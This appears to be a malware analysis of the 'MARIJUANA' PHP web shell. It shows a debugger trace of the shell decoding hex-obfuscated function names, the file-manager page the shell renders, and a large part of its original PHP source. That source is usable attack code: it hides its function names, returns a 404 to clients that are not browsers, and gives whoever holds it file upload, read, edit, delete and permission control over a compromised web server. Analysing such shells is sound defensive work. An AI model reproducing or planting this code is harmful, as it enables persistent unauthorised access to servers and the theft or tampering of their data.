3	652	0	0.029983	523824	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	652	1	0.029994	523872
3	652	R			101
3	653	0	0.030007	523792	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	653	1	0.030018	523832
3	653	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	654	0	0.030047	523824	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	654	1	0.030059	523872
3	654	R			97
3	655	0	0.030071	523792	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	655	1	0.030082	523832
3	655	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	656	0	0.030111	523824	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	656	1	0.030123	523872
3	656	R			110
3	657	0	0.030135	523792	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	657	1	0.030146	523832
3	657	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	633	1	0.030176	523792
2	633	R			'ob_get_clean'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'ob_get_clean'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	658	0	0.030210	523792	uhex	1		/var/www/html/uploads/mar.php	44	1	'7265616466696c65'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	659	0	0.030241	523824	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	659	1	0.030252	523872
3	659	R			114
3	660	0	0.030265	523792	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	660	1	0.030276	523832
3	660	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	661	0	0.030306	523856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	661	1	0.030318	523904
3	661	R			101
3	662	0	0.030331	523824	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	662	1	0.030342	523864
3	662	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	663	0	0.030372	523856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	663	1	0.030383	523904
3	663	R			97
3	664	0	0.030396	523824	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	664	1	0.030407	523864
3	664	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	665	0	0.030436	523856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	665	1	0.030448	523904
3	665	R			100
3	666	0	0.030460	523824	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	666	1	0.030471	523864
3	666	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	667	0	0.030514	523856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'66'
3	667	1	0.030526	523904
3	667	R			102
3	668	0	0.030542	523824	chr	0		/var/www/html/uploads/mar.php	540	1	102
3	668	1	0.030553	523864
3	668	R			'f'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'f'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	669	0	0.030583	523856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	669	1	0.030594	523904
3	669	R			105
3	670	0	0.030606	523824	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	670	1	0.030618	523864
3	670	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	671	0	0.030647	523856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	671	1	0.030659	523904
3	671	R			108
3	672	0	0.030671	523824	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	672	1	0.030682	523864
3	672	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	673	0	0.030712	523856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	673	1	0.030723	523904
3	673	R			101
3	674	0	0.030736	523824	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	674	1	0.030747	523864
3	674	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	658	1	0.030777	523832
2	658	R			'readfile'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'readfile'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	675	0	0.030810	523832	uhex	1		/var/www/html/uploads/mar.php	44	1	'617373657274'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	676	0	0.030840	523864	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	676	1	0.030852	523912
3	676	R			97
3	677	0	0.030864	523832	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	677	1	0.030876	523872
3	677	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	678	0	0.030914	523896	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	678	1	0.030933	523944
3	678	R			115
3	679	0	0.030950	523864	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	679	1	0.030965	523904
3	679	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	680	0	0.031047	523896	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	680	1	0.031064	523944
3	680	R			115
3	681	0	0.031081	523864	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	681	1	0.031096	523904
3	681	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	682	0	0.031136	523896	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	682	1	0.031152	523944
3	682	R			101
3	683	0	0.031168	523864	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	683	1	0.031183	523904
3	683	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	684	0	0.031223	523896	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	684	1	0.031239	523944
3	684	R			114
3	685	0	0.031256	523864	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	685	1	0.031271	523904
3	685	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	686	0	0.031311	523896	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	686	1	0.031327	523944
3	686	R			116
3	687	0	0.031343	523864	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	687	1	0.031358	523904
3	687	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	675	1	0.031398	523864
2	675	R			'assert'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'assert'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	688	0	0.031445	523864	preg_match	0		/var/www/html/uploads/mar.php	46	2	'/Chrome|Firefox|Opera|Safari|Browser|Windows|Linux|Macintosh|Mac OS|Android|iP(ad|hone|od)/i'	'python-requests/2.25.1'
2	688	1	0.031481	523928
2	688	R			0
2	689	0	0.031499	523864	header	0		/var/www/html/uploads/mar.php	47	1	'HTTP/1.0 404 Not Found'
2	689	1	0.031518	523920
2	689	R			NULL
			0.031581	428176
TRACE END   [2023-02-13 00:38:14.720816]


Generated HTML code

<html dir="auto" lang="en-US"><head>
			<meta charset="UTF-8">
			<meta name="robots" content="NOINDEX, NOFOLLOW">
				<title>MARIJUANA</title>	
<style>
@charset "UTF-8";@import url(https://use.fontawesome.com/releases/v5.8.1/css/all.css);@font-face{font-family:Consolas}html{margin-left:1em;margin-right:1em;margin-top:-1.5em;background:#189048!important;font-family:Courier;}.x{text-align:center}.y{font-family:i;font-size:calc(2.3em + 2.3vw);color:#181818}.y:hover{color:#fff}.w{color:#fff}.b{color:#000}.q{margin-top:.5em}article{margin-top:1.5em;font-size:.9em}.i{float:left}.u{float:right;text-align:right;margin-bottom:1.5em}input[type=file]{display:none}input[type=submit]{border:1px solid #181818;padding:.2em;background:0 0}td{color:#000}th{font-weight:400;border-bottom:thin solid #181818;color:#fff}.et{text-align:left;color:#000}.r:hover{background:#079992}.l{border:1px solid #181818;padding:1px;background:0 0}footer{margin-top:2em;height:2.2rem;width:100%;font-size:.9em}footer:hover{color:#fff}a{text-decoration:none;color:#000}a:hover{color:#fff}.m{margin-left:2.4em}textarea{background:0 0;border:none;width:70%;height:30em;font-family:Courier;font-size:.9em}textarea.o{background:#fff}.h{color:#ea2027}
</style>
		<style type="text/css" id="notify-bootstrap">.notifyjs-bootstrap-base {
	font-weight: bold;
	padding: 8px 15px 8px 14px;
	text-shadow: 0 1px 0 rgba(255, 255, 255, 0.5);
	background-color: #fcf8e3;
	border: 1px solid #fbeed5;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	white-space: nowrap;
	padding-left: 25px;
	background-repeat: no-repeat;
	background-position: 3px 7px;
}
.notifyjs-bootstrap-error {
	color: #B94A48;
	background-color: #F2DEDE;
	border-color: #EED3D7;
	background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAtRJREFUeNqkVc1u00AQHq+dOD+0poIQfkIjalW0SEGqRMuRnHos3DjwAH0ArlyQeANOOSMeAA5VjyBxKBQhgSpVUKKQNGloFdw4cWw2jtfMOna6JOUArDTazXi/b3dm55socPqQhFka++aHBsI8GsopRJERNFlY88FCEk9Yiwf8RhgRyaHFQpPHCDmZG5oX2ui2yilkcTT1AcDsbYC1NMAyOi7zTX2Agx7A9luAl88BauiiQ/cJaZQfIpAlngDcvZZMrl8vFPK5+XktrWlx3/ehZ5r9+t6e+WVnp1pxnNIjgBe4/6dAysQc8dsmHwPcW9C0h3fW1hans1ltwJhy0GxK7XZbUlMp5Ww2eyan6+ft/f2FAqXGK4CvQk5HueFz7D6GOZtIrK+srupdx1GRBBqNBtzc2AiMr7nPplRdKhb1q6q6zjFhrklEFOUutoQ50xcX86ZlqaZpQrfbBdu2R6/G19zX6XSgh6RX5ubyHCM8nqSID6ICrGiZjGYYxojEsiw4PDwMSL5VKsC8Yf4VRYFzMzMaxwjlJSlCyAQ9l0CW44PBADzXhe7xMdi9HtTrdYjFYkDQL0cn4Xdq2/EAE+InCnvADTf2eah4Sx9vExQjkqXT6aAERICMewd/UAp/IeYANM2joxt+q5VI+ieq2i0Wg3l6DNzHwTERPgo1ko7XBXj3vdlsT2F+UuhIhYkp7u7CarkcrFOCtR3H5JiwbAIeImjT/YQKKBtGjRFCU5IUgFRe7fF4cCNVIPMYo3VKqxwjyNAXNepuopyqnld602qVsfRpEkkz+GFL1wPj6ySXBpJtWVa5xlhpcyhBNwpZHmtX8AGgfIExo0ZpzkWVTBGiXCSEaHh62/PoR0p/vHaczxXGnj4bSo+G78lELU80h1uogBwWLf5YlsPmgDEd4M236xjm+8nm4IuE/9u+/PH2JXZfbwz4zw1WbO+SQPpXfwG/BBgAhCNZiSb/pOQAAAAASUVORK5CYII=);
}
.notifyjs-bootstrap-success {
	color: #468847;
	background-color: #DFF0D8;
	border-color: #D6E9C6;
	background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAutJREFUeNq0lctPE0Ecx38zu/RFS1EryqtgJFA08YCiMZIAQQ4eRG8eDGdPJiYeTIwHTfwPiAcvXIwXLwoXPaDxkWgQ6islKlJLSQWLUraPLTv7Gme32zoF9KSTfLO7v53vZ3d/M7/fIth+IO6INt2jjoA7bjHCJoAlzCRw59YwHYjBnfMPqAKWQYKjGkfCJqAF0xwZjipQtA3MxeSG87VhOOYegVrUCy7UZM9S6TLIdAamySTclZdYhFhRHloGYg7mgZv1Zzztvgud7V1tbQ2twYA34LJmF4p5dXF1KTufnE+SxeJtuCZNsLDCQU0+RyKTF27Unw101l8e6hns3u0PBalORVVVkcaEKBJDgV3+cGM4tKKmI+ohlIGnygKX00rSBfszz/n2uXv81wd6+rt1orsZCHRdr1Imk2F2Kob3hutSxW8thsd8AXNaln9D7CTfA6O+0UgkMuwVvEFFUbbAcrkcTA8+AtOk8E6KiQiDmMFSDqZItAzEVQviRkdDdaFgPp8HSZKAEAL5Qh7Sq2lIJBJwv2scUqkUnKoZgNhcDKhKg5aH+1IkcouCAdFGAQsuWZYhOjwFHQ96oagWgRoUov1T9kRBEODAwxM2QtEUl+Wp+Ln9VRo6BcMw4ErHRYjH4/B26AlQoQQTRdHWwcd9AH57+UAXddvDD37DmrBBV34WfqiXPl61g+vr6xA9zsGeM9gOdsNXkgpEtTwVvwOklXLKm6+/p5ezwk4B+j6droBs2CsGa/gNs6RIxazl4Tc25mpTgw/apPR1LYlNRFAzgsOxkyXYLIM1V8NMwyAkJSctD1eGVKiq5wWjSPdjmeTkiKvVW4f2YPHWl3GAVq6ymcyCTgovM3FzyRiDe2TaKcEKsLpJvNHjZgPNqEtyi6mZIm4SRFyLMUsONSSdkPeFtY1n0mczoY3BHTLhwPRy9/lzcziCw9ACI+yql0VLzcGAZbYSM5CCSZg1/9oc/nn7+i8N9p/8An4JMADxhH+xHfuiKwAAAABJRU5ErkJggg==);
}
.notifyjs-bootstrap-info {
	color: #3A87AD;
	background-color: #D9EDF7;
	border-color: #BCE8F1;
	background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAB3RJTUUH3QYFAhkSsdes/QAAA8dJREFUOMvVlGtMW2UYx//POaWHXg6lLaW0ypAtw1UCgbniNOLcVOLmAjHZolOYlxmTGXVZdAnRfXQm+7SoU4mXaOaiZsEpC9FkiQs6Z6bdCnNYruM6KNBw6YWewzl9z+sHImEWv+vz7XmT95f/+3/+7wP814v+efDOV3/SoX3lHAA+6ODeUFfMfjOWMADgdk+eEKz0pF7aQdMAcOKLLjrcVMVX3xdWN29/GhYP7SvnP0cWfS8caSkfHZsPE9Fgnt02JNutQ0QYHB2dDz9/pKX8QjjuO9xUxd/66HdxTeCHZ3rojQObGQBcuNjfplkD3b19Y/6MrimSaKgSMmpGU5WevmE/swa6Oy73tQHA0Rdr2Mmv/6A1n9w9suQ7097Z9lM4FlTgTDrzZTu4StXVfpiI48rVcUDM5cmEksrFnHxfpTtU/3BFQzCQF/2bYVoNbH7zmItbSoMj40JSzmMyX5qDvriA7QdrIIpA+3cdsMpu0nXI8cV0MtKXCPZev+gCEM1S2NHPvWfP/hL+7FSr3+0p5RBEyhEN5JCKYr8XnASMT0xBNyzQGQeI8fjsGD39RMPk7se2bd5ZtTyoFYXftF6y37gx7NeUtJJOTFlAHDZLDuILU3j3+H5oOrD3yWbIztugaAzgnBKJuBLpGfQrS8wO4FZgV+c1IxaLgWVU0tMLEETCos4xMzEIv9cJXQcyagIwigDGwJgOAtHAwAhisQUjy0ORGERiELgG4iakkzo4MYAxcM5hAMi1WWG1yYCJIcMUaBkVRLdGeSU2995TLWzcUAzONJ7J6FBVBYIggMzmFbvdBV44Corg8vjhzC+EJEl8U1kJtgYrhCzgc/vvTwXKSib1paRFVRVORDAJAsw5FuTaJEhWM2SHB3mOAlhkNxwuLzeJsGwqWzf5TFNdKgtY5qHp6ZFf67Y/sAVadCaVY5YACDDb3Oi4NIjLnWMw2QthCBIsVhsUTU9tvXsjeq9+X1d75/KEs4LNOfcdf/+HthMnvwxOD0wmHaXr7ZItn2wuH2SnBzbZAbPJwpPx+VQuzcm7dgRCB57a1uBzUDRL4bfnI0RE0eaXd9W89mpjqHZnUI5Hh2l2dkZZUhOqpi2qSmpOmZ64Tuu9qlz/SEXo6MEHa3wOip46F1n7633eekV8ds8Wxjn37Wl63VVa+ej5oeEZ/82ZBETJjpJ1Rbij2D3Z/1trXUvLsblCK0XfOx0SX2kMsn9dX+d+7Kf6h8o4AIykuffjT8L20LU+w4AZd5VvEPY+XpWqLV327HR7DzXuDnD8r+ovkBehJ8i+y8YAAAAASUVORK5CYII=);
}
.notifyjs-bootstrap-warn {
	color: #C09853;
	background-color: #FCF8E3;
	border-color: #FBEED5;
	background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAMAAAC6V+0/AAABJlBMVEXr6eb/2oD/wi7/xjr/0mP/ykf/tQD/vBj/3o7/uQ//vyL/twebhgD/4pzX1K3z8e349vK6tHCilCWbiQymn0jGworr6dXQza3HxcKkn1vWvV/5uRfk4dXZ1bD18+/52YebiAmyr5S9mhCzrWq5t6ufjRH54aLs0oS+qD751XqPhAybhwXsujG3sm+Zk0PTwG6Shg+PhhObhwOPgQL4zV2nlyrf27uLfgCPhRHu7OmLgAafkyiWkD3l49ibiAfTs0C+lgCniwD4sgDJxqOilzDWowWFfAH08uebig6qpFHBvH/aw26FfQTQzsvy8OyEfz20r3jAvaKbhgG9q0nc2LbZxXanoUu/u5WSggCtp1anpJKdmFz/zlX/1nGJiYmuq5Dx7+sAAADoPUZSAAAAAXRSTlMAQObYZgAAAAFiS0dEAIgFHUgAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfdBgUBGhh4aah5AAAAlklEQVQY02NgoBIIE8EUcwn1FkIXM1Tj5dDUQhPU502Mi7XXQxGz5uVIjGOJUUUW81HnYEyMi2HVcUOICQZzMMYmxrEyMylJwgUt5BljWRLjmJm4pI1hYp5SQLGYxDgmLnZOVxuooClIDKgXKMbN5ggV1ACLJcaBxNgcoiGCBiZwdWxOETBDrTyEFey0jYJ4eHjMGWgEAIpRFRCUt08qAAAAAElFTkSuQmCC);
}
</style><style type="text/css" id="core-notify">.notifyjs-corner {
	position: fixed;
	margin: 5px;
	z-index: 1050;
}

.notifyjs-corner .notifyjs-wrapper,
.notifyjs-corner .notifyjs-container {
	position: relative;
	display: block;
	height: inherit;
	width: inherit;
	margin: 3px;
}

.notifyjs-wrapper {
	z-index: 1;
	position: absolute;
	display: inline-block;
	height: 0;
	width: 0;
}

.notifyjs-container {
	display: none;
	z-index: 1;
	position: absolute;
}

.notifyjs-hidable {
	cursor: pointer;
}

[data-notify-text],[data-notify-html] {
	position: relative;
}

.notifyjs-arrow {
	position: absolute;
	z-index: 2;
	width: 0;
	height: 0;
}</style></head>

		<body>
			<header>
				<div class="y x">
					<a class="ajx" href="mar.php">
						MARIJuANA
					</a>
				</div>

				<div class="q x w">
					— DIOS — NO — CREA — NADA — EN — VANO —
				</div>
				
			</header>

			<article>
				<div class="i">
					<i class="far fa-hdd"></i>
					Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64
					<br>

					<i class="far fa-lightbulb"></i>   <b>SOFT  :</b> Apache/2.4.52 (Ubuntu) <b>PHP :</b> 7.2.34-37+ubuntu22.04.1+deb.sury.org+1
					<br>

					<i class="far fa-folder"></i>
					
					<a class="ajx" href="?d=2f">/</a><a class="ajx" href="?d=2f766172">var</a>/<a class="ajx" href="?d=2f7661722f777777">www</a>/<a class="ajx" href="?d=2f7661722f7777772f68746d6c">html</a>/
					<br>

				</div>

				<div class="u">
					::1 <i class="fas fa-link"></i>
					<br>

					<br>

					<form method="post" enctype="multipart/form-data">
						<label class="l w">
							<input type="file" name="n[]" onchange="this.form.submit()" multiple=""> &nbsp;UPLOAD
						</label>&nbsp;
					</form>

					
				</div>
					<table cellspacing="0" cellpadding="7" width="100%">
						<thead>
							<tr>
								<th width="44%">[ NAME ]</th>
								<th width="11%">[ SIZE ]</th>
								<th width="17%">[ PERM ]</th>
								<th width="17%">[ DATE ]</th>
								<th width="11%">[ ACT ]</th>
							</tr>
						</thead>
						<tbody>
							<tr>
								<td>
									<a class="ajx" href="?d=2f7661722f7777772f68746d6c&amp;n">+FILE</a>
									<a class="ajx" href="?d=2f7661722f7777772f68746d6c&amp;l">+DIR</a>
								</td>
							</tr>
						<tr class="r">
							<td>
								<i class="far fa-file m"></i> 
								<a class="ajx" href="?d=2f7661722f7777772f68746d6c&amp;s=62656e6572692e73655f6d616c776172655f616e616c79736973">beneri.se_malware_analysis</a>
							</td>
							<td class="x">
								0 KB
							</td>
							<td class="x">
								<a class="ajx w" href="?d=2f7661722f7777772f68746d6c&amp;k=62656e6572692e73655f6d616c776172655f616e616c79736973">-rw-r--r--</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d=2f7661722f7777772f68746d6c&amp;t=62656e6572692e73655f6d616c776172655f616e616c79736973">2023-02-12 21:37</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d=2f7661722f7777772f68746d6c&amp;r=62656e6572692e73655f6d616c776172655f616e616c79736973">R</a>
								<a class="ajx" href="?d=2f7661722f7777772f68746d6c&amp;e=62656e6572692e73655f6d616c776172655f616e616c79736973">E</a>
								<a href="?d=2f7661722f7777772f68746d6c&amp;g=62656e6572692e73655f6d616c776172655f616e616c79736973">G</a>
								
								<a href="?d=2f7661722f7777772f68746d6c&amp;x=62656e6572692e73655f6d616c776172655f616e616c79736973">D</a>
							</td>
						</tr>
						
						<tr class="r">
							<td>
								<i class="far fa-file m"></i> 
								<a class="ajx" href="?d=2f7661722f7777772f68746d6c&amp;s=6d61722e706870">mar.php</a>
							</td>
							<td class="x">
								15.783 KB
							</td>
							<td class="x">
								<a class="ajx w" href="?d=2f7661722f7777772f68746d6c&amp;k=6d61722e706870">-rw-rw-r--</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d=2f7661722f7777772f68746d6c&amp;t=6d61722e706870">2023-02-12 21:37</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d=2f7661722f7777772f68746d6c&amp;r=6d61722e706870">R</a>
								<a class="ajx" href="?d=2f7661722f7777772f68746d6c&amp;e=6d61722e706870">E</a>
								<a href="?d=2f7661722f7777772f68746d6c&amp;g=6d61722e706870">G</a>
								
								<a href="?d=2f7661722f7777772f68746d6c&amp;x=6d61722e706870">D</a>
							</td>
						</tr>
						
						</tbody>
						<tfoot>
							<tr>
								<th class="et">
									<a class="ajx" href="?d=2f7661722f7777772f68746d6c&amp;y">REQUEST</a>
									<a href="?d=2f7661722f7777772f68746d6c&amp;q">EXIT</a>
								</th>
								<th class="et" width="11%"></th>
								<th class="et" width="17%"></th>
								<th class="et" width="17%"></th>
								<th class="et" width="11%"></th>
							</tr>
					</tfoot>
				</table>
			</article>
			<footer class="x">
				©TheAlmightyZeus
			</footer>
			<script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
			<script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
			<script>
				$(".ajx").click(function(t){t.preventDefault();var e=$(this).attr("href");history.pushState("","",e),$.get(e,function(t){$("body").html(t)})});
			</script>
		
	
</body></html>

Original PHP code

<?php header("X-XSS-Protection: 0");ob_start();set_time_limit(0);error_reporting(0);ini_set('display_errors', FALSE);
$Array = [
		'7068705f756e616d65',
		'70687076657273696f6e',
		'6368646972',
		'676574637764',
		'707265675f73706c6974',
		'636f7079',
		'66696c655f6765745f636f6e74656e7473',
		'6261736536345f6465636f6465',
		'69735f646972',
		'6f625f656e645f636c65616e28293b',
		'756e6c696e6b',
		'6d6b646972',
		'63686d6f64',
		'7363616e646972',
		'7374725f7265706c616365',
		'68746d6c7370656369616c6368617273',
		'7661725f64756d70',
		'666f70656e',
		'667772697465',
		'66636c6f7365',
		'64617465',
		'66696c656d74696d65',
		'737562737472',
		'737072696e7466',
		'66696c657065726d73',
		'746f756368',
		'66696c655f657869737473',
		'72656e616d65',
		'69735f6172726179',
		'69735f6f626a656374',
		'737472706f73',
		'69735f7772697461626c65',
		'69735f7265616461626c65',
		'737472746f74696d65',
		'66696c6573697a65',
		'726d646972',
		'6f625f6765745f636c65616e',
		'7265616466696c65',
		'617373657274',
];
$___ = count($Array);
for($i=0;$i<$___;$i++) $GNJ[] = uhex($Array[$i]);
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  if(!preg_match("/Chrome|Firefox|Opera|Safari|Browser|Windows|Linux|Macintosh|Mac OS|Android|iP(ad|hone|od)/i", $_SERVER['HTTP_USER_AGENT'])) {
   header("HTTP/1.0 404 Not Found");
   exit;
 }
}
?>
<!DOCTYPE html>
	<html dir="auto" lang="en-US">

		<head>
			<meta charset="UTF-8">
			<meta name="robots" content="NOINDEX, NOFOLLOW">
				<title>MARIJUANA</title>	
<style>
@charset "UTF-8";@import url(https://use.fontawesome.com/releases/v5.8.1/css/all.css);@font-face{font-family:Consolas}html{margin-left:1em;margin-right:1em;margin-top:-1.5em;background:#189048!important;font-family:Courier;}.x{text-align:center}.y{font-family:i;font-size:calc(2.3em + 2.3vw);color:#181818}.y:hover{color:#fff}.w{color:#fff}.b{color:#000}.q{margin-top:.5em}article{margin-top:1.5em;font-size:.9em}.i{float:left}.u{float:right;text-align:right;margin-bottom:1.5em}input[type=file]{display:none}input[type=submit]{border:1px solid #181818;padding:.2em;background:0 0}td{color:#000}th{font-weight:400;border-bottom:thin solid #181818;color:#fff}.et{text-align:left;color:#000}.r:hover{background:#079992}.l{border:1px solid #181818;padding:1px;background:0 0}footer{margin-top:2em;height:2.2rem;width:100%;font-size:.9em}footer:hover{color:#fff}a{text-decoration:none;color:#000}a:hover{color:#fff}.m{margin-left:2.4em}textarea{background:0 0;border:none;width:70%;height:30em;font-family:Courier;font-size:.9em}textarea.o{background:#fff}.h{color:#ea2027}
</style>
		</head>

		<body>
			<header>
				<div class="y x">
					<a class="ajx" href="<?php echo basename($_SERVER['PHP_SELF']);?>">
						MARIJuANA
					</a>
				</div>

				<div class="q x w">
					&#8212; DIOS &#8212; NO &#8212; CREA &#8212; NADA &#8212; EN &#8212; VANO &#8212;
				</div>
				
			</header>

			<article>
				<div class="i">
					<i class="far fa-hdd"></i>
					<?php echo $GNJ[0]();?>

					<br />

					<i class="far fa-lightbulb"></i> &thinsp;&thinsp;<b>SOFT  :</b> <?php echo $_SERVER['SERVER_SOFTWARE'];?> <b>PHP :</b> <?php echo $GNJ[1]();?>

					<br />

					<i class="far fa-folder"></i>
					
					<?php
					if(isset($_GET["d"])) {
						$d = uhex($_GET["d"]);
						$GNJ[2](uhex($_GET["d"]));
					}
					else {
						$d = $GNJ[3]();
					}
					$k = $GNJ[4]("/(\\\|\/)/", $d );
					foreach ($k as $m => $l) { 
						if($l=='' && $m==0) {
							echo '<a class="ajx" href="?d=2f">/</a>';
						}
						if($l == '') { 
							continue;
						}
						echo '<a class="ajx" href="?d=';
						for ($i = 0; $i <= $m; $i++) {
							echo hex($k[$i]); 
							if($i != $m) {
								echo '2f';
							}
						}
						echo '">'.$l.'</a>/'; 
					}
					?>

					<br />

				</div>

				<div class="u">
					<?php echo $_SERVER['SERVER_ADDR'];?> <i class="fas fa-link"></i>
					<br />

					<br />

					<form method="post" enctype="multipart/form-data">
						<label class="l w">
							<input type="file" name="n[]" onchange="this.form.submit()" multiple> &nbsp;UPLOAD
						</label>&nbsp;
					</form>

					<?php
					$o_ = [ 
							'<script>$.notify("',
							'", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'
						];
					$f = $o_[0].'OK!'.$o_[1];
					$g = $o_[0].'ER!'.$o_[1];
					if(isset($_FILES["n"])) {
						$z = $_FILES["n"]["name"];
						$r = count($z);
						for( $i=0 ; $i < $r ; $i++ ) {
							if($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) {
								echo $f;
							}
							else {
								echo $g;
							}
						}
					}
					?>

				</div>
					<?php
					$a_ = '<table cellspacing="0" cellpadding="7" width="100%">
						<thead>
							<tr>
								<th>';
					$b_ = '</th>
							</tr>
						</thead>
						<tbody>
							<tr>
								<td></td>
							</tr>
							<tr>
								<td class="x">';
					$c_ = '</td>
							</tr>
						</tbody>
					</table>';
					$d_ = '<br />
										<br />
										<input type="submit" class="w" value="&nbsp;OK&nbsp;" />
									</form>';
					if(isset($_GET["s"])) {
						echo $a_.uhex($_GET["s"]).$b_.'
									<textarea readonly="yes">'.$GNJ[15]($GNJ[6](uhex($_GET["s"]))).'</textarea>
									<br />
									<br />
									<input onclick="location.href=\'?d='.$_GET["d"].'&e='.$_GET["s"].'\'" type="submit" class="w" value="&nbsp;EDIT&nbsp;" />
								'.$c_;
					}
					elseif(isset($_GET["y"])) {
						echo $a_.'REQUEST'.$b_.'
									<form method="post">
										<input class="x" type="text" name="1" />&nbsp;&nbsp;
										<input class="x" type="text" name="2" />
										'.$d_.'
									<br />
									<textarea readonly="yes">';

									if(isset($_POST["2"])) {
										echo $GNJ[15](dre($_POST["1"], $_POST["2"]));
									}

								echo '</textarea>
								'.$c_;
					}
					elseif(isset($_GET["e"])) {
						echo $a_.uhex($_GET["e"]).$b_.'
									<form method="post">
										<textarea name="e" class="o">'.$GNJ[15]($GNJ[6](uhex($_GET["e"]))).'</textarea>
										<br />
										<br />
										<span class="w">BASE64</span> :
										<select id="b64" name="b64">
											<option value="0">NO</option>
											<option value="1">YES</option>
										</select>
